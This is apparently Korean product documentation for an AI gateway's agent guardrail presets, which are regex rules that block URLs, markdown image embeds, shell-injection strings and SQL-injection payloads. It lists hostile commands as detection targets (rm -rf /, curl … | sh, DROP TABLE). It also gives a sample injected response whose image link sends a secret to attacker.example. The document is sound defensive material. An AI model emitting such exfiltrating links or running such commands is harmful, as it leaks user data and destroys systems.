에이전틱 guardrails

모델이 툴을 구동할 때, 위험한 문자열은 평범한 콘텐츠 안에 숨습니다: 에이전트가 곧 가져올 URL, 클라이언트가 자동 로드할 마크다운 이미지, 모델이 셸 툴에 되울리는 rm -rf /, SQL 러너가 실행하도록 내보내는 UNION SELECT. PII나 시크릿만 생각하는 콘텐츠 정책은 이 넷 모두를 놓칩니다. Agent 프리셋 카테고리는 정확히 이 형태를 위해 존재합니다 — 다운스트림 툴이 그것에 작용하기 전에 요청이나 응답을 차단하는 결정적 regex 규칙. 이것은 에이전틱 유스 케이스에 초점을 둔 랜딩입니다. 완전한 guardrail 엔진 — 모든 규칙 타입, 필드, 스테이지, 라우트 — 은 Guardrails 레퍼런스를 참조하세요.

1. 에이전트 guardrails가 별개의 표면인 이유

guardrail은 콘텐츠를 검사합니다 — 요청의 텍스트와 응답의 텍스트. 에이전트의 경우, 그 텍스트는 액션이 됩니다: URL이 가져와지고, 마크다운이 렌더링되고, 셸 라인이 실행되고, SQL이 실행됩니다. 따라서 PII에 사용하는 동일한 block / mask 엔진이 여기서 이중 역할을 합니다 — 에이전트의 툴 레이어가 그것을 부작용으로 바꾸기 전에 페이로드를 게이트웨이에서 멈춥니다. Agent 카테고리는 네 개의 프리셋을 제공하며, 각각이 액션 block이 있는 regex 규칙으로, 두 스테이지에 걸쳐 나뉩니다:

URL Filter — input, block

요청의 모든 http(s) URL을 차단합니다. 아웃바운드 URL이 개방되기보다 허용 목록에 있어야 하는 에이전트 흐름에 사용하세요. 씨앗 패턴은 모든 URL을 매치합니다; 특정 도메인을 허용하려면 정규식을 편집하세요.

Markdown Image Block — output, block

모델의 응답에서 마크다운 이미지 임베드(![alt](url))를 차단합니다. 원격 이미지를 자동 로드하는 클라이언트에서 이미지 렌더링 유출에 대해 방어합니다 — 렌더링된 이미지 URL이 데이터를 몰래 빼내는 고전적인 데이터 유출 채널.

Tool Call Shell Block — input, block

요청의 명백한 셸 인젝션 패턴(rm -rf /, curl … | sh, wget … | bash, sudo 권한 상승)을 차단합니다. 사용자 입력을 셸 툴로 전달할 수 있는 에이전트 흐름에 사용하세요.

SQL Injection in Output — output, block

고전적인 SQL 인젝션 페이로드(UNION SELECT, OR 1=1, DROP TABLE, 주석 종료자)를 운반하는 모델 응답을 차단합니다. 모델이 생성한 SQL을 자동 실행하는 툴을 위한 심층 방어.

두 프리셋은 입력을, 두 프리셋은 출력을 검사합니다. URL Filter와 Tool Call Shell Block은 요청에서 발동합니다 — 모델이 실행되기 전, 어떤 쿼터가 계량되기 전. Markdown Image Block과 SQL Injection in Output은 응답에서 발동합니다 — 모델이 응답한 후, 콘텐츠가 당신의 클라이언트나 그 툴 레이어에 도달하기 전. 위험이 어느 스테이지에 존재하는지 아는 것이 전부입니다; 입력 스테이지와 출력 스테이지를 참조하세요.

2. 콘솔에서 에이전트 guardrail 적용하기

여기 모든 단계는 당신의 세션에서 호스팅된 게이트웨이에 대한 콘솔 액션입니다. guardrail을 생성하고 편집하려면 워크스페이스에서 **Developer+**가 필요합니다. 최종 /v1/* 호출만 sk-orca-... 릴레이 키를 사용합니다 — guardrail 자체는 전적으로 콘솔에서 구성됩니다.

템플릿 열기

콘솔에서 Guardrails를 열고, New guardrail 분할 버튼을 클릭한 뒤, Agent 템플릿 카테고리에서 프리셋을 선택합니다 — 예: Markdown Image Block. 올바른 스테이지에서 단일 regex block 규칙을 씨앗으로 만듭니다.

이름 지정 및 저장

이름을 지정하고(≤ 64자), 예: agent-rails, 저장합니다. 프리셋은 씨앗이지 잠금이 아닙니다 — 이후에 다른 세 Agent 규칙을 추가하거나 정규식을 자유롭게 편집하세요 (§4 참조).

샌드박스에서 테스트

에디터 내부의 Test 탭을 열고, 샘플을 붙여넣고, 맞는 스테이지를 선택한 뒤, 현재 정책을 로컬에서 실행합니다 — 업스트림 호출 없음, 쿼터 없음 (§3 참조).

키 연결

API 키를 편집하고 Guardrail 드롭다운에서 agent-rails를 선택하거나(키에 guardrail_id 설정), 워크스페이스 기본값으로 표시합니다. 키에 연결하기와 계정 기본값을 참조하세요.

3. 연결하기 전에 증명하기

어떤 키가 그것을 가리키기 전에 규칙이 발동함을 증명하세요. Test 탭을 열고, output 스테이지를 선택한 뒤, 공격자가 오염시킨 페이지가 모델을 내보내도록 유도했을 수 있는 응답을 붙여넣습니다:

Here is the result: ![status](https://attacker.example/track?d=secret)

샌드박스는 현재 정책을 로컬에서 평가하고 — 업스트림으로 아무것도 보내지 않고, 아무것도 계량되지 않습니다 — 발동한 규칙을 명시하는 block 판정을 반환합니다. 적대적 및 양성 샘플의 코퍼스에 대한 A/B 그리드는 한 탭 옆의 평가 하니스에 있습니다.

4. 규칙 조합 및 튜닝

네 프리셋은 씨앗입니다. 흔한 동작은 그것들을 하나의 agent-rails guardrail로 결합하고 각 정규식을 당신의 스택에 맞게 조이는 것입니다:

URL 허용 목록

URL Filter에서 시작한 뒤, regex를 편집하여 당신의 승인된 도메인을 제외한 모든 URL을 차단하게 하세요 — 무차별적 차단 대신 매치를 허용 목록으로 반전하세요.

자신의 탐지기 작성

당신의 툴이 신경 쓰는 모든 페이로드 형태에 대해 regex 규칙을 추가하세요 — RE2 패턴, 선형 시간, 역참조 없음. 패턴은 한 번 컴파일되어 요청 전반에서 캐시됩니다.

하나의 guardrail에서 Agent 규칙을 엔진의 나머지와 혼합하세요. PII Shield mask 규칙이나 Secrets Blocker 입력 차단과 짝지으세요 — 하나의 정책이 모든 규칙 타입을 운반할 수 있고 엔진이 그것들을 단일 판정으로 접습니다. block vs. mask vs. flag는 액션을 참조하세요.

5. 차단이 어떻게 보이는가

모든 Agent 프리셋은 block 액션을 사용합니다. 차단된 요청은 오류 코드 guardrail_blocked와 함께 HTTP 400을 반환하며, 발동한 guardrail과 규칙을 명시하는 메시지를 담습니다:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

차단된 요청은 쿼터를 소모하지 않습니다 — 입력 스테이지 차단(URL Filter, Tool Call Shell Block)은 계량 전에 발동하고; 출력 스테이지 차단(Markdown Image Block, SQL Injection in Output)은 응답이 거부된 후 사전 소모된 쿼터를 환불합니다 — 그리고 skip-retry로 표시됩니다. 동일한 프롬프트를 다시 실행해도 그저 다시 차단될 뿐이기 때문입니다. guardrail_blocked 오류를 참조하세요.

출력 차단은 스트리밍에서도 강제됩니다. 두 출력 스테이지 Agent 프리셋의 경우, block은 양방향으로 유지됩니다: 비스트리밍 응답에서는 답변이 반환되기 전에 검사되고, 스트리밍 응답에서는 스캐너가 차단된 콘텐츠가 클라이언트에 도달하기 전에 스트림을 도중에 끊습니다. 스트리밍 커버리지를 참조하세요.

6. guardrails는 콘텐츠; firewall은 툴 호출

에이전트 guardrails는 강력한 첫 레이어이지만, 툴 의미론이 아니라 문자열에 대해 추론합니다. 콘텐츠 안의 셸 라인을 차단합니다 — 모델이 파괴적 툴로 구조화된 tool_call을 내보냈다거나, 아웃바운드 요청이 메타데이터 IP로 향하고 있다는 것을 이해하지 못합니다. 그 툴 호출 레이어가 Firewall입니다: 모델이 내보낸 tool_calls, MCP tools/call, 그리고 아웃바운드 egress를 allow / audit / deny / pending_approval 같은 판정으로 평가합니다. 둘은 결합됩니다 — guardrails는 텍스트를 검사하고, firewall은 액션을 관리합니다.

Firewall

모델이 내보낸 툴 호출, MCP 호출, egress를 allow / audit / deny / 승인 판정으로 관리합니다.

Guardrails vs. Firewall

콘텐츠 guardrail vs. 툴 호출 firewall을 언제 찾을지 — 그리고 둘 다 실행하는 방법.

AI 에이전트 보안

전체 에이전트 제어 스택: 콘텐츠, 툴, MCP, egress.

과도한 에이전시

이 레일이 다루는 위협 — 해야 할 것보다 더 많이 하는 에이전트.

7. 무엇이 발동했는지 보기

발동하는 모든 규칙은 match를 기록합니다 — 규칙 타입, 액션, 스테이지, 그리고 상세 문자열 — 워크스페이스 Matches 피드에 표시됩니다. 매치된 부분 문자열 자체는 Log raw content가 켜져 있을 때 만 기록되며, 이는 기본적으로 꺼져 있습니다. guardrail별, 규칙 타입별, 액션별로 피드를 그룹화하고 필터링하여 에이전트 규칙 히트율을 지켜보고 거짓 양성을 튜닝하세요. Matches 피드, 로깅 및 프라이버시, 그리고 거짓 양성 튜닝을 참조하세요.

8. 다음으로 갈 곳

출력 스테이지 규칙

Markdown Image Block과 SQL Injection in Output에 대해 응답 검사가 어떻게 작동하는지.

정규식 탐지기

Agent 규칙을 확장하기 위해 자신의 RE2 패턴을 작성합니다.

데이터 유출

Markdown Image Block이 닫는 유출 채널.

위험한 툴 호출

콘텐츠 레일만으로는 왜 충분하지 않은지 — firewall과 짝지으세요.

에이전트 guardrails는 에이전트가 보내고 받는 콘텐츠에서 위험한 문자열을 차단합니다. 에이전트가 취하는 액션을 — 툴 호출, MCP 호출, egress 자체를 — 관리하려면 Firewall로 올라가고 AI 에이전트 보안 기준선을 읽으세요. 완전한 guardrail 엔진은 Guardrails 레퍼런스를 참조하세요.

​1. 에이전트 guardrails가 별개의 표면인 이유

​2. 콘솔에서 에이전트 guardrail 적용하기

​3. 연결하기 전에 증명하기

​4. 규칙 조합 및 튜닝

URL 허용 목록

자신의 탐지기 작성

​5. 차단이 어떻게 보이는가

​6. guardrails는 콘텐츠; firewall은 툴 호출

Firewall

Guardrails vs. Firewall

AI 에이전트 보안

과도한 에이전시

​7. 무엇이 발동했는지 보기

​8. 다음으로 갈 곳

출력 스테이지 규칙

정규식 탐지기

데이터 유출

위험한 툴 호출

1. 에이전트 guardrails가 별개의 표면인 이유

2. 콘솔에서 에이전트 guardrail 적용하기

3. 연결하기 전에 증명하기

4. 규칙 조합 및 튜닝

5. 차단이 어떻게 보이는가

6. guardrails는 콘텐츠; firewall은 툴 호출

7. 무엇이 발동했는지 보기

8. 다음으로 갈 곳